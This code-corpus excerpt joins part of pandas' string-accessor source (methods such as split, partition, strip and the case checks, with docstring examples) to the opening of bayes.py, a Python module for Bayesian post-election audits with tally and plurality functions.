1 b-
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='outer', na_rep='-')
0 aa
1 b-
2 -c
3 dd
4 -e
dtype: object
>>>
>>> s.str.cat(t, join='inner', na_rep='-')
0 aa
2 -c
3 dd
dtype: object
>>>
>>> s.str.cat(t, join='right', na_rep='-')
3 dd
0 aa
4 -e
2 -c
dtype: object
For more examples, see :ref:`here <text.concatenate>`.
"""
from pandas import Index, Series, concat
if isinstance(others, str):
raise ValueError("Did you mean to supply a `sep` keyword?")
if sep is None:
sep = ""
if isinstance(self._orig, Index):
data = Series(self._orig, index=self._orig)
else: # Series
data = self._orig
# concatenate Series/Index with itself if no "others"
if others is None:
data = ensure_object(data)
na_mask = isna(data)
if na_rep is None and na_mask.any():
data = data[~na_mask]
elif na_rep is not None and na_mask.any():
data = np.where(na_mask, na_rep, data)
return sep.join(data)
try:
# turn anything in "others" into lists of Series
others, warn = self._get_series_list(others, ignore_index=(join is None))
except ValueError: # do not catch TypeError raised by _get_series_list
if join is None:
raise ValueError(
"All arrays must be same length, except "
"those having an index if `join` is not None"
)
else:
raise ValueError(
"If `others` contains arrays or lists (or "
"other list-likes without an index), these "
"must all be of the same length as the "
"calling Series/Index."
)
if join is None and warn:
warnings.warn(
"A future version of pandas will perform index "
"alignment when `others` is a Series/Index/"
"DataFrame (or a list-like containing one). To "
"disable alignment (the behavior before v.0.23) and "
"silence this warning, use `.values` on any Series/"
"Index/DataFrame in `others`. To enable alignment "
"and silence this warning, pass `join='left'|"
"'outer'|'inner'|'right'`. The future default will "
"be `join='left'`.",
FutureWarning,
stacklevel=3,
)
# if join is None, _get_series_list already force-aligned indexes
join = "left" if join is None else join
# align if required
if any(not data.index.equals(x.index) for x in others):
# Need to add keys for uniqueness in case of duplicate columns
others = concat(
others,
axis=1,
join=(join if join == "inner" else "outer"),
keys=range(len(others)),
sort=False,
copy=False,
)
data, others = data.align(others, join=join)
others = [others[x] for x in others] # again list of Series
all_cols = [ensure_object(x) for x in [data] + others]
na_masks = np.array([isna(x) for x in all_cols])
union_mask = np.logical_or.reduce(na_masks, axis=0)
if na_rep is None and union_mask.any():
# no na_rep means NaNs for all rows where any column has a NaN
# only necessary if there are actually any NaNs
result = np.empty(len(data), dtype=object)
np.putmask(result, union_mask, np.nan)
not_masked = ~union_mask
result[not_masked] = cat_safe([x[not_masked] for x in all_cols], sep)
elif na_rep is not None and union_mask.any():
# fill NaNs with na_rep in case there are actually any NaNs
all_cols = [
np.where(nm, na_rep, col) for nm, col in zip(na_masks, all_cols)
]
result = cat_safe(all_cols, sep)
else:
# no NaNs - can just concatenate
result = cat_safe(all_cols, sep)
if isinstance(self._orig, Index):
# add dtype for case that result is all-NA
result = Index(result, dtype=object, name=self._orig.name)
else: # Series
result = Series(
result, dtype=object, index=data.index, name=self._orig.name
)
return result
_shared_docs[
"str_split"
] = r"""
Split strings around given separator/delimiter.
Splits the string in the Series/Index from the %(side)s,
at the specified delimiter string. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
pat : str, optional
String or regular expression to split on.
If not specified, split on whitespace.
n : int, default -1 (all)
Limit number of splits in output.
``None``, 0 and -1 will be interpreted as return all splits.
expand : bool, default False
Expand the splitted strings into separate columns.
* If ``True``, return DataFrame/MultiIndex expanding dimensionality.
* If ``False``, return Series/Index, containing lists of strings.
Returns
-------
Series, Index, DataFrame or MultiIndex
Type matches caller unless ``expand=True`` (see Notes).
See Also
--------
Series.str.split : Split strings around given separator/delimiter.
Series.str.rsplit : Splits string around given separator/delimiter,
starting from the right.
Series.str.join : Join lists contained as elements in the Series/Index
with passed delimiter.
str.split : Standard library version for split.
str.rsplit : Standard library version for rsplit.
Notes
-----
The handling of the `n` keyword depends on the number of found splits:
- If found splits > `n`, make first `n` splits only
- If found splits <= `n`, make all splits
- If for a certain row the number of found splits < `n`,
append `None` for padding up to `n` if ``expand=True``
If using ``expand=True``, Series and Index callers return DataFrame and
MultiIndex objects, respectively.
Examples
--------
>>> s = pd.Series(["this is a regular sentence",
... "https://docs.python.org/3/tutorial/index.html",
... np.nan])
0 this is a regular sentence
1 https://docs.python.org/3/tutorial/index.html
2 NaN
dtype: object
In the default setting, the string is split by whitespace.
>>> s.str.split()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
Without the `n` parameter, the outputs of `rsplit` and `split`
are identical.
>>> s.str.rsplit()
0 [this, is, a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `n` parameter can be used to limit the number of splits on the
delimiter. The outputs of `split` and `rsplit` are different.
>>> s.str.split(n=2)
0 [this, is, a regular sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
>>> s.str.rsplit(n=2)
0 [this is a, regular, sentence]
1 [https://docs.python.org/3/tutorial/index.html]
2 NaN
dtype: object
The `pat` parameter can be used to split by other characters.
>>> s.str.split(pat = "/")
0 [this is a regular sentence]
1 [https:, , docs.python.org, 3, tutorial, index...
2 NaN
dtype: object
When using ``expand=True``, the split elements will expand out into
separate columns. If NaN is present, it is propagated throughout
the columns during the split.
>>> s.str.split(expand=True)
0 1 2 3
0 this is a regular
1 https://docs.python.org/3/tutorial/index.html None None None
2 NaN NaN NaN NaN \
4
0 sentence
1 None
2 NaN
For slightly more complex use cases like splitting the html document name
from a url, a combination of parameter settings can be used.
>>> s.str.rsplit("/", n=1, expand=True)
0 1
0 this is a regular sentence None
1 https://docs.python.org/3/tutorial index.html
2 NaN NaN
Remember to escape special characters when explicitly using regular
expressions.
>>> s = pd.Series(["1+1=2"])
>>> s.str.split(r"\+|=", expand=True)
0 1 2
0 1 1 2
"""
@Appender(_shared_docs["str_split"] % {"side": "beginning", "method": "split"})
@forbid_nonstring_types(["bytes"])
def split(self, pat=None, n=-1, expand=False):
result = str_split(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
@Appender(_shared_docs["str_split"] % {"side": "end", "method": "rsplit"})
@forbid_nonstring_types(["bytes"])
def rsplit(self, pat=None, n=-1, expand=False):
result = str_rsplit(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
pat : str, default whitespace
.. deprecated:: 0.24.0
Use ``sep`` instead
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
dtype='object')
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
f = lambda x: x.partition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
f = lambda x: x.rpartition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@copy(str_get)
def get(self, i):
result = str_get(self._parent, i)
return self._wrap_result(result)
@copy(str_join)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
result = str_join(self._parent, sep)
return self._wrap_result(result)
@copy(str_contains)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=np.nan, regex=True):
result = str_contains(
self._parent, pat, case=case, flags=flags, na=na, regex=regex
)
return self._wrap_result(result, fill_value=na)
@copy(str_match)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=np.nan):
result = str_match(self._parent, pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na)
@copy(str_replace)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):
result = str_replace(
self._parent, pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@copy(str_repeat)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
result = str_repeat(self._parent, repeats)
return self._wrap_result(result)
@copy(str_pad)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
result = str_pad(self._parent, width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
Filling %(side)s side of strings in the Series/Index with an
additional character. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``
fillchar : str
Additional character for filling, default is whitespace
Returns
-------
filled : Series/Index of objects
"""
@Appender(_shared_docs["str_pad"] % dict(side="left and right", method="center"))
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="right", method="ljust"))
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="left", method="rjust"))
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
"""
Pad strings in the Series/Index by prepending '0' characters.
Strings in the Series/Index are padded with '0' characters on the
left of the string to reach a total string length `width`. Strings
in the Series/Index with length greater or equal to `width` are
unchanged.
Parameters
----------
width : int
Minimum length of resulting string; strings with length less
than `width` will be prepended with '0' characters.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character.
Series.str.ljust : Fills the right side of strings with an arbitrary
character.
Series.str.pad : Fills the specified sides of strings with an arbitrary
character.
Series.str.center : Fills both sides of strings with an arbitrary
character.
Notes
-----
Differs from :meth:`str.zfill` which has special handling
for '+'/'-' in the string.
Examples
--------
>>> s = pd.Series(['-1', '1', '1000', 10, np.nan])
>>> s
0 -1
1 1
2 1000
3 10
4 NaN
dtype: object
Note that ``10`` and ``NaN`` are not strings, therefore they are
converted to ``NaN``. The minus sign in ``'-1'`` is treated as a
regular character and the zero is added to the left of it
(:meth:`str.zfill` would have moved it to the left). ``1000``
remains unchanged as it is longer than `width`.
>>> s.str.zfill(3)
0 0-1
1 001
2 1000
3 NaN
4 NaN
dtype: object
"""
result = str_pad(self._parent, width, side="left", fillchar="0")
return self._wrap_result(result)
@copy(str_slice)
def slice(self, start=None, stop=None, step=None):
result = str_slice(self._parent, start, stop, step)
return self._wrap_result(result)
@copy(str_slice_replace)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
result = str_slice_replace(self._parent, start, stop, repl)
return self._wrap_result(result)
@copy(str_decode)
def decode(self, encoding, errors="strict"):
# need to allow bytes here
result = str_decode(self._parent, encoding, errors)
return self._wrap_result(result)
@copy(str_encode)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
result = str_encode(self._parent, encoding, errors)
return self._wrap_result(result)
_shared_docs[
"str_strip"
] = r"""
Remove leading and trailing characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"] % dict(side="left and right sides", method="strip")
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="both")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="left side", method="lstrip"))
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="left")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="right side", method="rstrip"))
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="right")
return self._wrap_result(result)
@copy(str_wrap)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
result = str_wrap(self._parent, width, **kwargs)
return self._wrap_result(result)
@copy(str_get_dummies)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
# we need to cast to Series of strings as only that has all
# methods available for making the dummies...
data = self._orig.astype(str) if self._is_categorical else self._parent
result, name = str_get_dummies(data, sep)
return self._wrap_result(
result, use_codes=(not self._is_categorical), name=name, expand=True
)
@copy(str_translate)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
result = str_translate(self._parent, table)
return self._wrap_result(result)
count = _pat_wrapper(str_count, flags=True, name="count")
startswith = _pat_wrapper(str_startswith, na=True, name="startswith")
endswith = _pat_wrapper(str_endswith, na=True, name="endswith")
findall = _pat_wrapper(str_findall, flags=True, name="findall")
@copy(str_extract)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
return str_extract(self, pat, flags=flags, expand=expand)
@copy(str_extractall)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
return str_extractall(self._orig, pat, flags=flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index
where the substring is fully contained between [start:end].
Return -1 on failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of integer values
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% dict(
side="lowest",
method="find",
also="rfind : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["find"]
% dict(
side="highest",
method="rfind",
also="find : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
"""
Return the Unicode normal form for the strings in the Series/Index.
For more information on the forms, see the
:func:`unicodedata.normalize`.
Parameters
----------
form : {'NFC', 'NFKC', 'NFD', 'NFKD'}
Unicode form
Returns
-------
normalized : Series/Index of objects
"""
import unicodedata
f = lambda x: unicodedata.normalize(form, x)
result = _na_map(f, self._parent)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each strings where the substring is
fully contained between [start:end]. This is the same as
``str.%(similar)s`` except instead of returning -1, it raises a ValueError
when the substring is not found. Equivalent to standard ``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of objects
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% dict(
side="lowest",
similar="find",
method="index",
also="rindex : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["index"]
% dict(
side="highest",
similar="rfind",
method="rindex",
also="index : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
_shared_docs[
"len"
] = """
Compute the length of each element in the Series/Index. The element may be
a sequence (such as a string, tuple or list) or a collection
(such as a dictionary).
Returns
-------
Series or Index of int
A Series or Index of integer values indicating the length of each
element in the Series or Index.
See Also
--------
str.len : Python built-in function returning the length of an object.
Series.size : Returns the length of the Series.
Examples
--------
Returns the length (number of characters) in a string. Returns the
number of entries for dictionaries, lists or tuples.
>>> s = pd.Series(['dog',
... '',
... 5,
... {'foo' : 'bar'},
... [2, 3, 5, 7],
... ('one', 'two', 'three')])
>>> s
0 dog
1
2 5
3 {'foo': 'bar'}
4 [2, 3, 5, 7]
5 (one, two, three)
dtype: object
>>> s.str.len()
0 3.0
1 0.0
2 NaN
3 1.0
4 4.0
5 3.0
dtype: float64
"""
len = _noarg_wrapper(
len, docstring=_shared_docs["len"], forbidden_types=None, dtype=int
)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
Series.str.casefold : Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
# _doc_args holds dict of strings to use in substituting casemethod docs
_doc_args = {} # type: Dict[str, Dict[str, str]]
_doc_args["lower"] = dict(type="lowercase", method="lower", version="")
_doc_args["upper"] = dict(type="uppercase", method="upper", version="")
_doc_args["title"] = dict(type="titlecase", method="title", version="")
_doc_args["capitalize"] = dict(
type="be capitalized", method="capitalize", version=""
)
_doc_args["swapcase"] = dict(type="be swapcased", method="swapcase", version="")
_doc_args["casefold"] = dict(
type="be casefolded",
method="casefold",
version="\n .. versionadded:: 0.25.0\n",
)
lower = _noarg_wrapper(
lambda x: x.lower(),
name="lower",
docstring=_shared_docs["casemethods"] % _doc_args["lower"],
)
upper = _noarg_wrapper(
lambda x: x.upper(),
name="upper",
docstring=_shared_docs["casemethods"] % _doc_args["upper"],
)
title = _noarg_wrapper(
lambda x: x.title(),
name="title",
docstring=_shared_docs["casemethods"] % _doc_args["title"],
)
capitalize = _noarg_wrapper(
lambda x: x.capitalize(),
name="capitalize",
docstring=_shared_docs["casemethods"] % _doc_args["capitalize"],
)
swapcase = _noarg_wrapper(
lambda x: x.swapcase(),
name="swapcase",
docstring=_shared_docs["casemethods"] % _doc_args["swapcase"],
)
casefold = _noarg_wrapper(
lambda x: x.casefold(),
name="casefold",
docstring=_shared_docs["casemethods"] % _doc_args["casefold"],
)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s3.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s3.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
assumed to be any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = dict(type="alphanumeric", method="isalnum")
_doc_args["isalpha"] = dict(type="alphabetic", method="isalpha")
_doc_args["isdigit"] = dict(type="digits", method="isdigit")
_doc_args["isspace"] = dict(type="whitespace", method="isspace")
_doc_args["islower"] = dict(type="lowercase", method="islower")
_doc_args["isupper"] = dict(type="uppercase", method="isupper")
_doc_args["istitle"] = dict(type="titlecase", method="istitle")
_doc_args["isnumeric"] = dict(type="numeric", method="isnumeric")
_doc_args["isdecimal"] = dict(type="decimal", method="isdecimal")
isalnum = _noarg_wrapper(
lambda x: x.isalnum(),
name="isalnum",
docstring=_shared_docs["ismethods"] % _doc_args["isalnum"],
)
isalpha = _noarg_wrapper(
lambda x: x.isalpha(),
name="isalpha",
docstring=_shared_docs["ismethods"] % _doc_args["isalpha"],
)
isdigit = _noarg_wrapper(
lambda x: x.isdigit(),
name="isdigit",
docstring=_shared_docs["ismethods"] % _doc_args["isdigit"],
)
isspace = _noarg_wrapper(
lambda x: x.isspace(),
name="isspace",
docstring=_shared_docs["ismethods"] % _doc_args["isspace"],
)
islower = _noarg_wrapper(
lambda x: x.islower(),
name="islower",
docstring=_shared_docs["ismethods"] % _doc_args["islower"],
)
isupper = _noarg_wrapper(
lambda x: x.isupper(),
name="isupper",
docstring=_shared_docs["ismethods"] % _doc_args["isupper"],
)
istitle = _noarg_wrapper(
lambda x: x.istitle(),
name="istitle",
docstring=_shared_docs["ismethods"] % _doc_args["istitle"],
)
isnumeric = _noarg_wrapper(
lambda x: x.isnumeric(),
name="isnumeric",
docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"],
)
isdecimal = _noarg_wrapper(
lambda x: x.isdecimal(),
name="isdecimal",
docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"],
)
@classmethod
def _make_accessor(cls, data):
cls._validate(data)
return cls(data)
| apache-2.0 | -8,466,611,931,052,144,000 | 29.541679 | 88 | 0.565437 | false | 3.99698 | false | false | false |
ron-rivest/2017-bayes-audit | from-2012-bayes-audit/bayes.py | 1 | 21492 | # bayes.py
# Code for working with Bayes Post-Election Audits
# Ronald L. Rivest and Emily Shen
# 5/31/12
"""
----------------------------------------------------------------------
This code available under "MIT License" (open source).
Copyright (C) 2012 Ronald L. Rivest and Emily Shen.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------
"""
"""
Notation:
Even though Python is 0-indexed, we'll use one-indexing here, to
correspond better with our paper. The 0-th element of lists (arrays)
will be ignored (and is typically set to the dummy value -9).
m -- the number of candidates (for plurality elections)
t -- the number of distinct ballot types possible resulting from
a machine scan or hand examination of a ballot.
One may consider "undervote" and "overvote" to be
ballot types (although they shouldn't win), in
             which case we have t = m+2 for a plurality election.
The ballot types are coded as integers: 1, ..., t.
n -- the number of ballots cast.
r[1..n] -- the list of all the *reported* ballot types.
This is the "reported profile" for the election.
That is, r[i] is the ``machine result'' for ballot i.
a[1..n] -- the list of all the corresponding *actual* ballot types.
This is the "actual profile" for the election.
That is, a[i] is the ``hand audit result'' for ballot i.
In practice, these become known only one at a time,
as audited, instead of all at once, as coded here.
s -- the size of the current sample (the number of ballots
audited so far).
epsilon -- the provided ``upset risk limit'' (e.g. 0.05)
"""
######################################################################
# Reminder: this code runs about 7x faster with "pypy" than with
# the standard python interpreter ! Use pypy!
######################################################################
import math
import random
import string
import time
dummy = -9 # dummy value for array position 0
######################################################################
# TALLY
######################################################################
def tally(P,t):
"""
Return list of counts of each ballot type in profile P.
Assumes each entry of P[1:] is in 1...t, inclusive.
P is 0-indexed; dummy value P[0] is ignored.
returned count[j] is number of votes of type j, 1<=j<=t.
returned count[0] is a dummy value.
"""
count = [dummy]+[0]*t
for i in range(1,len(P)):
count[P[i]] += 1
return count
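# Example (illustrative):
# print tally([dummy, 1, 1, 2], 3)
# --> [-9, 2, 1, 0]  (dummy slot, then counts for ballot types 1..3)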
######################################################################
# SOCIAL CHOICE FUNCTION
######################################################################
"""
The social choice function that returns an election outcome for a
given profile with the tally results that are given in count[1..t].
The election outcome is typically an integer
(e.g. the most common ballot type), but can be any arbitrary
Python object that can be compared for equality.
There are many ways this routine could be coded, depending on the
choice of voting system; any (deterministic) voting system could
be used.
For our purposes, it is important that the social choice function f be
well-defined even for non-integer counts, since our Dirichlet
approximations will give non-integral values. This is OK, since
almost all voting systems are based on comparing vote totals of
various sorts, and integrality of vote totals is not required.
In practice, one may want to disallow "undervote" and "overvote" from
winning, if they are ballot types. This may be accomplished by
supplying an extra (optional) argument to f, a dictionary that
supplies additional parameters and information to f (in a way
that may depend on f, of course). See the example for plurality
below.
"""
def f_plurality(count,params=None):
"""
A simple example social choice function -- plurality elections.
Here we assume that the most common ballot type "wins", with
ties broken in favor of the lower-numbered outcome.
If params is supplied to f_plurality, it should be a dict such that
params['invalid'] is a list of outcomes that are not be allowed to win.
For example, f(count,{'invalid':[1]}) will not allow outcome 1.
You can use closures to get the desired binding of params in
social choice function, e.g.
        g = lambda count: f_plurality(count,{'invalid':[1]})
defines social choice function g that embeds the desired params
into f_plurality; g only takes count as an argument (the params
are now implicit).
"""
t = len(count)-1
if params != None:
invalid_list = params.get('invalid',[])
else:
invalid_list = []
outcome = 1
while outcome < t and outcome in invalid_list:
outcome += 1
for j in xrange(outcome+1,t+1):
if count[j]>count[outcome] and outcome not in invalid_list:
outcome = j
return outcome
